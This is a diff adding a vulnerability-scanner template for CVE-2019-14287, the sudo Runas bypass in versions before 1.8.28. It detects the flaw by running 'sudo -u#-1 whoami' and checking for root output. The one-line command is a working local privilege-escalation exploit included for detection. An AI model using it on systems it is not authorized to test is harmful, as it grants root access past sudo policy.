Create CVE-2019-14287.yaml

code/cves/2019/CVE-2019-14287.yaml

@@ -0,0 +1,38 @@
+id: CVE-2019-14287
+
+info:
+  name: Sudo <= 1.8.27 - Security Bypass
+  author: daffainfo
+  severity: high
+  description: |
+    In Sudo before 1.8.28, an attacker with access to a Runas ALL sudoer account can bypass certain policy blacklists and session PAM modules, and can cause incorrect logging, by invoking sudo with a crafted user ID. For example, this allows bypass of !root configuration, and USER= logging, for a "sudo -u \#$((0xffffffff))" command.
+  reference:
+    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14287
+    - https://www.exploit-db.com/exploits/47502
+  metadata:
+    verified: true
+    max-request: 2
+    vendor: canonical
+    product: ubuntu_linux
+  tags: cve,cve2019,sudo,code,linux,privesc,local
+
+self-contained: true
+code:
+  - engine:
+      - sh
+      - bash
+    source: |
+      whoami
+
+  - engine:
+      - sh
+      - bash
+    source: |
+      sudo -u#-1 whoami
+
+    matchers:
+      - type: dsl
+        dsl:
+          - '!contains(code_1_response, "root")'
+          - 'contains(code_2_response, "root")'
+        condition: and